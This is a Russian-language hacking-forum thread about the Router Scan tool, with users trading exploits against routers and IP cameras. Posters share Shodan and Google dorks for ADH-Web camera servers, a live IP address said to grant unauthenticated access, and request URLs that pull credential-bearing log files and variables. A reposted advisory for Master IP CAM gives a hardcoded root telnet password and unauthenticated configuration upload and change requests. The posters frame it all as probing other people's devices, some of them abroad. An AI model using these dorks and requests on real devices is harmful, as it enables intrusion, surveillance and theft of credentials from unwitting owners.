прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,512
    Likes Received:
    9,459
    Reputations:
    118
    У вас старая сборка librouter.dll, нужно обновить.
     
  2. hydra

    hydra Well-Known Member

    Joined:
    24 Jul 2015
    Messages:
    2,163
    Likes Received:
    19,733
    Reputations:
    30
    Сгонял сегодня посмотреть как там да чё.Оказалось,разворотили там щит не со свитчем,а с питанием для свитча.(он отдельно смонтирован)Ну курочить второй щит,я конечно же не стал.:D
     
    sha9 and masilij like this.
  3. hydra

    hydra Well-Known Member

    Joined:
    24 Jul 2015
    Messages:
    2,163
    Likes Received:
    19,733
    Reputations:
    30
    Перезалил.http://rgho.st/7VMZwGkDN
     
  4. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,512
    Likes Received:
    9,459
    Reputations:
    118
    1. Не нужно сканировать одно устройство с двумя портами сразу (80 и 443), добавьте одно в исключения (иначе конфликтуют)
    2. В логах не увидел успешной авторизации, пароль к админке известен?
     
    sha9 likes this.
  5. hydra

    hydra Well-Known Member

    Joined:
    24 Jul 2015
    Messages:
    2,163
    Likes Received:
    19,733
    Reputations:
    30
    Дубль три. http://rgho.st/7PwYSgd6v
     
    sha9 likes this.
  6. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,512
    Likes Received:
    9,459
    Reputations:
    118
    Нет там успешной авторизации.

    Потребуется записать сессию Charles с первичной загрузкой страницы и (успешной) авторизацией, может быть у этого интерфейса другой способ аутентификации.
     
    sha9 likes this.
  7. hydra

    hydra Well-Known Member

    Joined:
    24 Jul 2015
    Messages:
    2,163
    Likes Received:
    19,733
    Reputations:
    30
    Я извиняюсь,за свою невнимательность.Успешной авторизации там действительно нет,и не было.Сам незнаю,с чего мне в башку такое пришло.
    Сессию попробую записать.
     
    sha9 likes this.
  8. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,512
    Likes Received:
    9,459
    Reputations:
    118
    Всякое бывает, главное пришли к консенсусу. :)
     
    hydra and sha9 like this.
  9. jungo88

    jungo88 New Member

    Joined:
    12 Nov 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Hi,

    Why sometimes RS show password on Asus RT-XXX v 2.0 device.. and later, in other scan, same ip device, show only ESSID ?
     
  10. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,512
    Likes Received:
    9,459
    Reputations:
    118
    One exploit can obtain web interface password.
    Another exploit can only obtain BSSID and ESSID.

    Whether one of these exploits work depends on the router firmware.
     
    sha9 likes this.
  11. jungo88

    jungo88 New Member

    Joined:
    12 Nov 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    how get to work both script ? same fimware, same ip only scan later, but show only essid, no password, never.
     
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,512
    Likes Received:
    9,459
    Reputations:
    118
    Install the oldest and vulnerable firmware to the router.
     
  13. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    606
    Likes Received:
    3,642
    Reputations:
    170
    From vulnerability description:
    ... will be treated as signed-in if any other administrator session is active.
     
    Triton_Mgn, sha9 and binarymaster like this.
  14. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    689
    Likes Received:
    988
    Reputations:
    7
    "Пользуясь случаем, хочу." (c)
    Хочу поделится для всех интересующихся, портабельной версией Charles 4.0, описание в архиве:
    https://yadi.sk/d/oCqBP7os3Rbdch
     
    Pebenok70, hydra, Triton_Mgn and 6 others like this.
  15. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    562
    Likes Received:
    733
    Reputations:
    2
    вы меня сподвигаете на подвиги во имя роутерскана :)

    тут натолкнулся недавно на одну железку - ADH-Web Server IP-Cameras. это не просто обычная айпи-камера. целый и довольно интересный сервер (пояснения для принципиальных анти-вуайеристов) :p:D:D:D

    ради интереса нашел экслойтик, но нет возможности сейчас его докрутить до удобоваримого для роутерскана состояния. может кто поиграется поплотнее?
    директория / hdd0 /logs
    позволяет удаленно просматривать произвольные файлы и получить многочисленную информацию через параметр «variable» в скрипте variable.cgi.

    шодан дорк :

    ADH-Web

    /gui/gui_outer_frame.shtml

    гугл дорк :
    /gui/gui_outer_frame.shtml
    можно просто, без поисковых запросов.

    этот без авторизации пускает в настройки. для изучения файловой структуры
    85.189.234.21:8080

    пример запроса:
    http://ip/hdd0/logs/log.txt

    наиболее интересные файлы
    bak.txt
    connect.txt
    log.txt
    seclog.log
    startup.txt
    DBGLOG.TXT
    access.txt
    security.txt

    проверенные апишники не даю. подвесят страждующие. только в личку (при необходимости) и только binarymaster-у. каждый может сам найти. в гугле их валом. правда не на всех прошивках срабатывает.

    полное описание эксплойта ( там есть еще реализации)
    ADH-Web Server IP-Cameras Improper Access Restrictions

    Vulnerability Details

    Usually this directory can be protected against
    unauthenticated access (401 Unauthorized), though, it can access all files
    directly without requiring authentication.As in the statement below:

    [401]
    . 'http://<target_ip>/hdd0/logs'
    [200]
    . 'http://<target_ip>/hdd0/logs/log.txt'

    Most common logfiles:

    . 'bak.txt
    . 'connect.txt'
    . 'log.txt'
    . 'seclog.log'
    . 'startup.txt'
    . 'DBGLOG.TXT'
    . 'access.txt'
    . 'security.txt'

    Impact

    This could allow a remote attacker to obtain valuable information such as
    access credentials, Network configuration and other sensitive information
    in plain text.

    Another problem identified is an information exposure via the parameter
    "variable" in variable.cgi script. Knowing some variables can extract a
    reasonable amount of information. For exemplo:

    * DNS
    . 'http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0'

    * ftp master ftp console credenthials ((the development team said that this
    credential is not used, then why does it exist?):
    . '
    http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
    '
    . '
    http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
    '

    (although the vast majority of servers have ftp / telnet with anonymous
    access allowed.)

    * alarms
    . 'http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0'
    * camconfig
    . 'http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1'
    (includes, but is not limited to) There are a lot of variables [an audit
    tool is on the way].

    This servers also sends credentials (and other sensitive data) via GET
    parameters
    This is poor practice as the URL is liable to be logged in any number of
    places
    between the customer and the camera. The credentials should be passed in
    the body
    of a POST request (under SSL of course, here is not the case). .
    (Is possible to create, edit and delete users and other configurations in
    this way, dangerous)

    4. *Vulnerable Products and Packages*

    . The following products are affected:
    - SD Advanced Closed IPTV
    - SD Advanced
    - EcoSense
    - Digital Sprite 2

    сорри если баян. память последнее время что-то подводить стала :) в случае чего - удалю пост, дабы не засорять форум.

    п.с. осторожнее с экспериментами. основная часть найденных мной серверов находится в штатах и грейтбритан :). а то опять крику будет, по поводу атак русских хакеров :). никто ведь не поймет, что это всего лишь дух творчества и здоровой любознательности :)
     
    #5615 sha9, 20 Jan 2018
    Last edited: 20 Jan 2018
  16. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    562
    Likes Received:
    733
    Reputations:
    2
    еще один свежий эксплойт на Master IP CAM. дорк не получилось найти. если кто сталкивался-поделитесь для экспериментов.
    I DESCRIPTION
    ========================================================================
    The Master IP CAM 01 suffers of multiple vulnerabilities:

    # [CVE-2018-5723] Hardcoded Password for Root Account
    # [CVE-2018-5724] Unauthenticated Configuration Download and Upload
    # [CVE-2018-5725] Unauthenticated Configuration Change
    # [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure


    II PROOF OF CONCEPT
    ========================================================================

    ## [CVE-2018-5723] Hardcoded Password for Root Account

    Is possible to access telnet with the hardcoded credential root:cat1029


    ## [CVE-2018-5724] Unauthenticated Configuration Download and Upload

    Download:

    http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi

    Upload Form:

    ### Unauthenticated Configuration Upload
    <form name="form6" method="post" enctype="multipart/form-data"
    action="cgi-bin/hi3510/restore.cgi" >
    <input type="file" name="setting_file" >
    <input type="submit" value="restore" >
    </form>


    ## [CVE-2018-5725] Unauthenticated Configuration Change

    Change configuration:

    http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080

    List of available commands here:
    http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf


    ## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure

    Retrieve sensitive information:

    http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser

    на мой взгляд этот CVE-2018-5726 наиболее интересен, в том числе и для роутерскана.
     
  17. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,512
    Likes Received:
    9,459
    Reputations:
    118
    Этот уже добавлен.
    Опечатка.
     
    sha9 likes this.
  18. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    562
    Likes Received:
    733
    Reputations:
    2
    исправил

    жаль, что опоздал. а я как-раз шодан-дорк нашел :(:confused::D RT_IPC

    пост с эксплойтом не удаляю. может кому интересно будет самому поиграться...

    п.с. интересная статья на этот счет
    http://syrion.me/blog/master-ipcam/
     
    #5618 sha9, 20 Jan 2018
    Last edited: 20 Jan 2018
    Triton_Mgn and Ossen like this.
  19. Deus

    Deus Member

    Joined:
    18 Jun 2015
    Messages:
    24
    Likes Received:
    5
    Reputations:
    0
    Можно ли от сканировать майнеры Bitmain Antminer, попадалось кому то?
     
  20. Deus

    Deus Member

    Joined:
    18 Jun 2015
    Messages:
    24
    Likes Received:
    5
    Reputations:
    0
    Я задал вопрос, а не делему дураков, форум для того и форум, википедию вам в помощь, Люди воспитанные на сказках про Иванушку-дурачка и Соловья-разбойника не могут быть иными как генетическими склонными к преступлениям и недоразвитыми мозгами,которых следует изолировать от нормального сообщества в целях локализации чумы...
     
Loading...